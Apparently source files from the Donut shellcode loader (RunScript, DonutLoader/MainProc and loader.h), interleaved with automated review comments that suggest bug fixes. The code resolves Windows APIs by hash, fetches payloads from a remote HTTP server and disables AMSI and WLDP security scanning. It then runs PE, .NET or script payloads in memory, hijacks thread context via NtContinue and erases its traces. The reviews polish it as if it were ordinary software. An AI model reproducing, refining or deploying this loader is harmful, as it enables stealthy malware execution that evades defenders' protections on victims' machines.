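Review bot: The token-copy loops in IsExitAPI and SetCommandLineW can write one byte past their stack buffers: when a token reaches 128 characters the `for` exits with `i == 128`, and the following `api[i] = '\0';` / `sym[i] = '\0';` stores at index 128 of `CHAR api[128]` / `CHAR sym[128]`. Bounding the copy at `i < (INT)sizeof(api) - 1` (and likewise for `sym`) keeps the terminator inside the array; the tokens come from `inst->exit_api` and `inst->cmd_syms`, not from the loaded module, so this is a latent bug as far as the visible code shows. Separately, in SetCommandLineW `ds` and `cnt` are assigned only inside the section-scan loop, so if no section name matches `inst->dataname` the pointer loop that follows reads them uninitialized; initialising `cnt = 0;` before the scan, or returning FALSE when nothing matched, makes that path defined.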
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IActiveScriptSiteWindowVtbl siteWnd_vtbl;
38 IHostVtbl wscript_vtbl;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43 WCHAR buf[DONUT_MAX_NAME+1];
44
45 // 1. Allocate memory for unicode format of script
46 script = (PWCHAR)inst->api.VirtualAlloc(
47 NULL,
48 (inst->mod_len + 1) * sizeof(WCHAR),
49 MEM_COMMIT | MEM_RESERVE,
50 PAGE_READWRITE);
51
52 // 2. Convert string to unicode.
53 if(script != NULL) {
54 // 2. Convert string to unicode.
55 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
56 -1, script, mod->len * sizeof(WCHAR));
57
58 // setup the IActiveScriptSite interface
59 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
60 ActiveScript_New(inst, &mas.site);
61
62 // setup the IActiveScriptSiteWindow interface for GUI stuff
63 mas.siteWnd.lpVtbl = (IActiveScriptSiteWindowVtbl*)&siteWnd_vtbl;
64 ActiveScriptSiteWindow_New(inst, &mas.siteWnd);
65
66 // setup the IHost interface for WScript object
67 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
68 Host_New(inst, &mas.wscript);
69
70 // 4. Initialize COM, MyIActiveScriptSite
71 DPRINT("CoInitializeEx");
72 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
73
74 if(hr == S_OK) {
75 // 5. Instantiate the active script engine
76 DPRINT("CoCreateInstance(IID_IActiveScript)");
77
78 hr = inst->api.CoCreateInstance(
79 &inst->xCLSID_ScriptLanguage, 0,
80 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
81 &inst->xIID_IActiveScript, (void **)&engine);
82
83 if(hr == S_OK) {
84 // 6. Get IActiveScriptParse object from engine
85 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
86
87 hr = engine->lpVtbl->QueryInterface(
88 engine,
89 #ifdef _WIN64
90 &inst->xIID_IActiveScriptParse64,
91 #else
92 &inst->xIID_IActiveScriptParse32,
93 #endif
94 (void **)&parser);
95
96 if(hr == S_OK) {
97 // 7. Initialize parser
98 DPRINT("IActiveScriptParse::InitNew");
99 hr = parser->lpVtbl->InitNew(parser);
100
101 if(hr == S_OK) {
102 // 8. Set custom script interface
103 DPRINT("IActiveScript::SetScriptSite");
104 mas.wscript.lpEngine = engine;
105
106 hr = engine->lpVtbl->SetScriptSite(
107 engine, (IActiveScriptSite *)&mas);
108
109 if(hr == S_OK) {
110 DPRINT("IActiveScript::AddNamedItem(\"%s\")", inst->wscript);
111 ansi2unicode(inst, inst->wscript, buf);
112 obj = inst->api.SysAllocString(buf);
113 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
114 inst->api.SysFreeString(obj);
115
116 if(hr == S_OK) {
117 // 9. Load script
118 DPRINT("IActiveScriptParse::ParseScriptText");
119 hr = parser->lpVtbl->ParseScriptText(
120 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
121
122 if(hr == S_OK) {
123 // 10. Run script
124 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
125 hr = engine->lpVtbl->SetScriptState(
126 engine, SCRIPTSTATE_CONNECTED);
127
128 // SetScriptState blocks here
129 }
130 }
131 }
132 }
133 DPRINT("IActiveScriptParse::Release");
134 parser->lpVtbl->Release(parser);
135 }
136 DPRINT("IActiveScript::Close");
137 engine->lpVtbl->Close(engine);
138
139 DPRINT("IActiveScript::Release");
140 engine->lpVtbl->Release(engine);
141 }
142 }
143 DPRINT("Erasing script from memory");
144 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
145
146 DPRINT("VirtualFree(script)");
147 inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
148 }
149 }
150
151 #include "activescript.c"
152 #include "wscript.c"
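Review bot: The destination size passed to MultiByteToWideChar on the `mod->len * sizeof(WCHAR)` line is in the wrong unit: `cchWideChar` counts WCHARs, but the buffer was allocated as `(inst->mod_len + 1) * sizeof(WCHAR)` bytes, i.e. `inst->mod_len + 1` WCHARs, so the call is told it may write twice as many characters as exist (and from a different length field than the allocation). Passing `inst->mod_len + 1` matches both the allocation and the later Memset; the return value should also be checked so that a failed conversion does not hand an unconverted buffer to ParseScriptText. Minor: `len` and `disabled` are declared but never used, and the "2. Convert string to unicode." comment appears twice while step 3 is skipped.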
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "loader.h"
32
33 DWORD MainProc(PDONUT_INSTANCE inst);
34
35 HANDLE DonutLoader(PDONUT_INSTANCE inst) {
36 CreateThread_t _CreateThread;
37 GetThreadContext_t _GetThreadContext;
38 GetCurrentThread_t _GetCurrentThread;
39 NtContinue_t _NtContinue;
40 ULONG64 hash;
41 HANDLE h = NULL;
42 CONTEXT c;
43
44 // create thread and execute original entrypoint?
45 if(inst->oep != 0) {
46 DPRINT("Resolving address of CreateThread");
47 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.CreateThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
48 _CreateThread = (CreateThread_t)xGetProcAddress(inst, hash, inst->iv);
49
50 // api resolved?
51 if(_CreateThread != NULL) {
52 // create new thread
53 DPRINT("Creating new thread");
54 h = _CreateThread(NULL, 0, ADR(LPTHREAD_START_ROUTINE, MainProc), (LPVOID)inst, 0, NULL);
55 } else {
56 DPRINT("FAILED");
57 return (HANDLE)-1;
58 }
59
60 DPRINT("Resolving address of NtContinue");
61 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.NtContinue) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
62 _NtContinue = (NtContinue_t)xGetProcAddress(inst, hash, inst->iv);
63
64 DPRINT("Resolving address of GetThreadContext");
65 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.GetThreadContext) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
66 _GetThreadContext = (GetThreadContext_t)xGetProcAddress(inst, hash, inst->iv);
67
68 DPRINT("Resolving address of GetCurrentThread");
69 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.GetCurrentThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
70 _GetCurrentThread = (GetCurrentThread_t)xGetProcAddress(inst, hash, inst->iv);
71
72 if(_NtContinue != NULL && _GetThreadContext != NULL && _GetCurrentThread != NULL) {
73 c.ContextFlags = CONTEXT_FULL;
74 _GetThreadContext(_GetCurrentThread(), &c);
75 #ifdef _WIN64
76 c.Rip = inst->oep;
77 c.Rsp &= -16;
78 #else
79 c.Eip = inst->oep;
80 c.Esp &= -4;
81 #endif
82 DPRINT("Calling NtContinue");
83 //__debugbreak();
84 _NtContinue(&c, FALSE);
85 }
86 } else {
87 // execute in existing thread
88 MainProc(inst);
89 }
90 return h;
91 }
92
93 DWORD MainProc(PDONUT_INSTANCE inst) {
94 ULONG i, ofs, wspace, fspace, len;
95 ULONG64 sig;
96 DONUT_ASSEMBLY assembly;
97 PDONUT_MODULE mod, unpck;
98 VirtualAlloc_t _VirtualAlloc;
99 VirtualFree_t _VirtualFree;
100 RtlExitUserProcess_t _RtlExitUserProcess;
101 LPVOID pv, ws;
102 ULONG64 hash;
103 BOOL disabled, term;
104 NTSTATUS nts;
105 PCHAR str;
106 CHAR path[MAX_PATH];
107
108 DPRINT("Maru IV : %" PRIX64, inst->iv);
109
110 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
111 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
112 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
113
114 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
115 DPRINT("Resolving address for VirtualFree() : %" PRIX64, hash);
116 _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
117
118 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.RtlExitUserProcess) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
119 DPRINT("Resolving address for RtlExitUserProcess() : %" PRIX64, hash);
120 _RtlExitUserProcess = (RtlExitUserProcess_t) xGetProcAddress(inst, hash, inst->iv);
121
122 if(_VirtualAlloc == NULL || _VirtualFree == NULL || _RtlExitUserProcess == NULL) {
123 DPRINT("FAILED!.");
124 return -1;
125 }
126
127 DPRINT("VirtualAlloc : %p VirtualFree : %p",
128 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
129
130 DPRINT("Allocating %i bytes of RW memory", inst->len);
131 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
132
133 if(pv == NULL) {
134 DPRINT("Memory allocation failed...");
135 // terminate host process?
136 if(inst->exit_opt == DONUT_OPT_EXIT_PROCESS) {
137 DPRINT("Terminating host process");
138 _RtlExitUserProcess(0);
139 }
140 return -1;
141 }
142 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
143 Memcpy(pv, inst, inst->len);
144 inst = (PDONUT_INSTANCE)pv;
145
146 DPRINT("Zero initializing PDONUT_ASSEMBLY");
147 Memset(&assembly, 0, sizeof(assembly));
148
149 // if encryption used
150 if(inst->entropy == DONUT_ENTROPY_DEFAULT) {
151 PBYTE inst_data;
152 // load pointer to data just past len + key
153 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
154
155 DPRINT("Decrypting %li bytes of instance", inst->len);
156
157 donut_decrypt(inst->key.mk,
158 inst->key.ctr,
159 inst_data,
160 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
161
162 DPRINT("Generating hash to verify decryption");
163 ULONG64 mac = maru(inst->sig, inst->iv);
164 DPRINT("Instance : %"PRIX64" | Result : %"PRIX64, inst->mac, mac);
165
166 if(mac != inst->mac) {
167 DPRINT("Decryption of instance failed");
168 goto erase_memory;
169 }
170 }
171 DPRINT("Resolving LoadLibraryA");
172
173 inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
174 if(inst->api.addr[0] == NULL) return -1;
175
176 str = (PCHAR)inst->dll_names;
177
178 // load the DLL required
179 for(;;) {
180 // store string until null byte or semi-colon encountered
181 for(i=0; str[i] != '\0' && str[i] !=';' && i<MAX_PATH; i++) path[i] = str[i];
182 // nothing stored? end
183 if(i == 0) break;
184 // skip name plus one for separator
185 str += (i + 1);
186 // store null terminator
187 path[i] = '\0';
188 DPRINT("Loading %s", path);
189 inst->api.LoadLibraryA(path);
190 }
191
192 DPRINT("Resolving %i API", inst->api_cnt);
193
194 for(i=1; i<inst->api_cnt; i++) {
195 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
196
197 inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
198
199 if(inst->api.addr[i] == NULL) {
200 DPRINT("Failed to resolve API");
201 goto erase_memory;
202 }
203 }
204
205 if(inst->type == DONUT_INSTANCE_HTTP) {
206 DPRINT("Module is stored on remote HTTP server.");
207 if(!DownloadFromHTTP(inst)) goto erase_memory;
208 mod = inst->module.p;
209 } else
210 if(inst->type == DONUT_INSTANCE_DNS) {
211 DPRINT("Module is stored on remote DNS server. (Currently unsupported)");
212 goto erase_memory;
213 //if(!DownloadFromDNS(inst)) goto erase_memory;
214 mod = inst->module.p;
215 } else
216 if(inst->type == DONUT_INSTANCE_EMBED) {
217 DPRINT("Module is embedded.");
218 mod = (PDONUT_MODULE)&inst->module.x;
219 }
220
221 // try bypassing AMSI and WLDP?
222 if(inst->bypass != DONUT_BYPASS_NONE) {
223 // Try to disable AMSI
224 disabled = DisableAMSI(inst);
225 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
226 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
227 goto erase_memory;
228
229 // Try to disable WLDP
230 disabled = DisableWLDP(inst);
231 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
232 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
233 goto erase_memory;
234 }
235
236 // module is compressed?
237 if(mod->compress != DONUT_COMPRESS_NONE) {
238 DPRINT("Compression engine is %"PRIx32, mod->compress);
239
240 DPRINT("Allocating %zd bytes of memory for decompressed file and module information",
241 mod->len + sizeof(DONUT_MODULE));
242
243 // allocate memory for module information + size of decompressed data
244 unpck = (PDONUT_MODULE)_VirtualAlloc(
245 NULL, ((sizeof(DONUT_MODULE) + mod->len) -4096) + 4096,
246 MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
247
248 if(unpck == NULL) goto erase_memory;
249
250 // copy the existing information to new block
251 DPRINT("Duplicating DONUT_MODULE");
252 Memcpy(unpck, mod, sizeof(DONUT_MODULE));
253
254 // decompress module data into new block
255 DPRINT("Decompressing %"PRId32 " -> %"PRId32, mod->zlen, mod->len);
256
257 if(mod->compress == DONUT_COMPRESS_LZNT1 ||
258 mod->compress == DONUT_COMPRESS_XPRESS ||
259 mod->compress == DONUT_COMPRESS_XPRESS_HUFF)
260 {
261 nts = inst->api.RtlGetCompressionWorkSpaceSize(
262 (mod->compress - 1) | COMPRESSION_ENGINE_MAXIMUM, &wspace, &fspace);
263
264 if(nts != 0) {
265 DPRINT("RtlGetCompressionWorkSpaceSize failed with %"PRIX32, nts);
266 goto erase_memory;
267 }
268
269 DPRINT("WorkSpace size : %"PRId32" | Fragment size : %"PRId32, wspace, fspace);
270
271 ws = (PDONUT_MODULE)_VirtualAlloc(
272 NULL, wspace, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
273
274 DPRINT("Decompressing with RtlDecompressBufferEx(%s)",
275 mod->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" :
276 mod->compress == DONUT_COMPRESS_XPRESS ? "XPRESS" : "XPRESS HUFFMAN");
277
278 nts = inst->api.RtlDecompressBufferEx(
279 (mod->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
280 (PUCHAR)unpck->data, mod->len,
281 (PUCHAR)&mod->data, mod->zlen, &len, ws);
282
283 _VirtualFree(ws, 0, MEM_RELEASE | MEM_DECOMMIT);
284
285 if(nts == 0) {
286 // assign pointer to mod
287 mod = unpck;
288 } else {
289 DPRINT("RtlDecompressBufferEx failed with %"PRIX32, nts);
290 goto erase_memory;
291 }
292 } else if(mod->compress == DONUT_COMPRESS_APLIB) {
293 DPRINT("Decompressing with aPLib");
294 aP_depack((PUCHAR)mod->data, (PUCHAR)unpck->data);
295 DPRINT("Done");
296 mod = unpck;
297 } else {
298 //
299 }
300 }
301 DPRINT("Checking type of module");
302
303 // unmanaged EXE/DLL?
304 if(mod->type == DONUT_MODULE_DLL ||
305 mod->type == DONUT_MODULE_EXE) {
306 RunPE(inst, mod);
307 } else
308 // .NET EXE/DLL?
309 if(mod->type == DONUT_MODULE_NET_DLL ||
310 mod->type == DONUT_MODULE_NET_EXE)
311 {
312 if(LoadAssembly(inst, mod, &assembly)) {
313 RunAssembly(inst, mod, &assembly);
314 }
315 FreeAssembly(inst, &assembly);
316 } else
317 // vbs or js?
318 if(mod->type == DONUT_MODULE_VBS ||
319 mod->type == DONUT_MODULE_JS)
320 {
321 RunScript(inst, mod);
322 }
323
324 erase_memory:
325 // if module was downloaded
326 if(inst->type == DONUT_INSTANCE_HTTP ||
327 inst->type == DONUT_INSTANCE_DNS)
328 {
329 if(inst->module.p != NULL) {
330 // overwrite memory with zeros
331 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
332
333 // free memory
334 _VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
335 inst->module.p = NULL;
336 }
337 }
338
339 // should we call RtlExitUserProcess?
340 term = (BOOL) (inst->exit_opt == DONUT_OPT_EXIT_PROCESS);
341
342 DPRINT("Erasing RW memory for instance");
343 Memset(inst, 0, inst->len);
344
345 DPRINT("Releasing RW memory for instance");
346 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
347
348 if(term) {
349 DPRINT("Terminating host process");
350 // terminate host process
351 _RtlExitUserProcess(0);
352 }
353 DPRINT("Returning to caller");
354 // return to caller, which invokes RtlExitUserThread
355 return 0;
356 }
357
358 int ansi2unicode(PDONUT_INSTANCE inst, CHAR input[], WCHAR output[DONUT_MAX_NAME]) {
359 return inst->api.MultiByteToWideChar(CP_ACP, 0, input,
360 -1, output, DONUT_MAX_NAME);
361 }
362
363 #include "peb.c" // resolve functions in export table
364 #include "http_client.c" // Download module from HTTP server
365 //#include "dns_client.c" // Download module from DNS server
366 #include "inmem_dotnet.c" // .NET assemblies
367 #include "inmem_pe.c" // Unmanaged PE/DLL files
368 #include "inmem_script.c" // VBS/JS files
369
370 #include "bypass.c" // Bypass AMSI and WLDP
371 #include "getpc.c" // code stub to return program counter (always at the end!)
372
373 // the following code is *only* for development purposes
374 // given an instance file, it will run as if running on a target system
375 // attach a debugger to host process
376 #ifdef DEBUG
377
378 #include <stdio.h>
379 #include <string.h>
380 #include <stdlib.h>
381 #include <sys/stat.h>
382
383 int main(int argc, char *argv[]) {
384 FILE *fd;
385 struct stat fs;
386 PDONUT_INSTANCE inst;
387 DWORD old;
388 HANDLE h;
389
390 if(argc != 2) {
391 printf(" [ usage: loader <instance>\n");
392 return 0;
393 }
394 // get size of instance
395 if(stat(argv[1], &fs) != 0) {
396 printf(" [ unable to obtain size of instance.\n");
397 return 0;
398 }
399
400 // zero size?
401 if(fs.st_size == 0) {
402 printf(" [ invalid instance.\n");
403 return 0;
404 }
405
406 // try open for reading
407 fd = fopen(argv[1], "rb");
408 if(fd == NULL) {
409 printf(" [ unable to open %s.\n", argv[1]);
410 return 0;
411 }
412
413 // allocate memory
414 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
415
416 if(inst != NULL) {
417 fread(inst, 1, fs.st_size, fd);
418
419 // change protection to PAGE_EXECUTE_READ
420 if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
421 printf("Running...");
422
423 // run payload with instance
424 h = DonutLoader(inst);
425
426 if(h != (HANDLE)-1 && inst->oep != 0) {
427 printf("\nWaiting...");
428 WaitForSingleObject(h, INFINITE);
429 }
430 }
431 // deallocate
432 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
433 }
434 fclose(fd);
435 return 0;
436 }
437 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef LOADER_H
32 #define LOADER_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45 #include <shlwapi.h>
46
47 #pragma comment(lib, "wininet.lib")
48 #pragma comment(lib, "advapi32.lib")
49 #pragma comment(lib, "crypt32.lib")
50 #pragma comment(lib, "ole32.lib")
51 #pragma comment(lib, "shlwapi.lib")
52 #pragma comment(lib, "shell32.lib")
53
54 #if defined(DEBUG)
55 #include <stdio.h>
56 #include <string.h>
57
58 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
59
60 #define DPRINT(...) { \
61 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
62 fprintf(stderr, __VA_ARGS__); \
63 }
64 #else
65 #define DPRINT(...) // Don't do anything in release builds
66 #endif
67
68 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
69 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
70 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
71
72 // Relative Virtual Address to Virtual Address
73 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
74
75 #if defined(_M_IX86) || defined(__i386__)
76 // return pointer to code in memory
77 char *get_pc(void);
78
79 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
80 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
81 #else
82 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
83 #endif
84
85 void *Memset(void *ptr, int value, unsigned int num);
86 void *Memcpy(void *destination, const void *source, unsigned int num);
87 int Memcmp(const void *ptr1, const void *ptr2, unsigned int num);
88 int _strcmp(const char *s1, const char *s2);
89 NTSTATUS RtlUserThreadStart(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter);
90
91 #if !defined(_MSC_VER)
92 #define memcmp(x,y,z) Memcmp(x,y,z)
93 #endif
94
95 #include "depack.h"
96 #include "peb.h" // Process Environment Block
97 #include "winapi.h" // Prototypes
98 #include "clr.h" // Common Language Runtime Interface
99
100 #include "donut.h"
101
102 #include "amsi.h" // Anti-malware Scan Interface
103 #include "activescript.h" // Interfaces for executing VBS/JS files
104 #include "wscript.h" // Interfaces to support WScript object
105
106 typedef struct {
107 IActiveScriptSite site;
108 IActiveScriptSiteWindow siteWnd;
109 IHost wscript;
110 PDONUT_INSTANCE inst; //
111 } MyIActiveScriptSite;
112
113 // internal structure
114 typedef struct _DONUT_ASSEMBLY {
115 ICLRMetaHost *icmh;
116 ICLRRuntimeInfo *icri;
117 ICorRuntimeHost *icrh;
118 IUnknown *iu;
119 AppDomain *ad;
120 Assembly *as;
121 Type *type;
122 MethodInfo *mi;
123 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
124
125 // Downloads a module from remote HTTP server into memory
126 BOOL DownloadFromHTTP(PDONUT_INSTANCE);
127
128 // .NET DLL/EXE
129 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
130 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
131 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
132
133 // In-Memory execution of native DLL
134 VOID RunPE(PDONUT_INSTANCE, PDONUT_MODULE);
135
136 // VBS / JS files
137 VOID RunScript(PDONUT_INSTANCE, PDONUT_MODULE);
138
139 // Disables Antimalware Scan Interface
140 BOOL DisableAMSI(PDONUT_INSTANCE);
141
142 // Disables Windows Lockdown Policy
143 BOOL DisableWLDP(PDONUT_INSTANCE);
144
145 LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
146
147 #endif
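Review bot: The debug DPRINT definition (gutter 60–63) expands to a bare brace block, so in a DEBUG build a statement such as `if(x) DPRINT("..."); else ...` fails to compile once the semicolon follows the closing brace, while the release expansion (an empty statement) accepts it — the two configurations compile different code. The usual `do { ... } while (0)` wrapper removes the divergence: `#define DPRINT(...) do { \`, `fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \`, `fprintf(stderr, __VA_ARGS__); } while (0)`. Separately, STATIC_KEY (gutter 68–70) is computed from `__TIME__`, so every compilation yields a different binary; a comment next to it stating that the build is intentionally not reproducible, and therefore cannot be verified against a reference build by hash, would help anyone packaging or auditing the project.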
0 DonutLoader
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
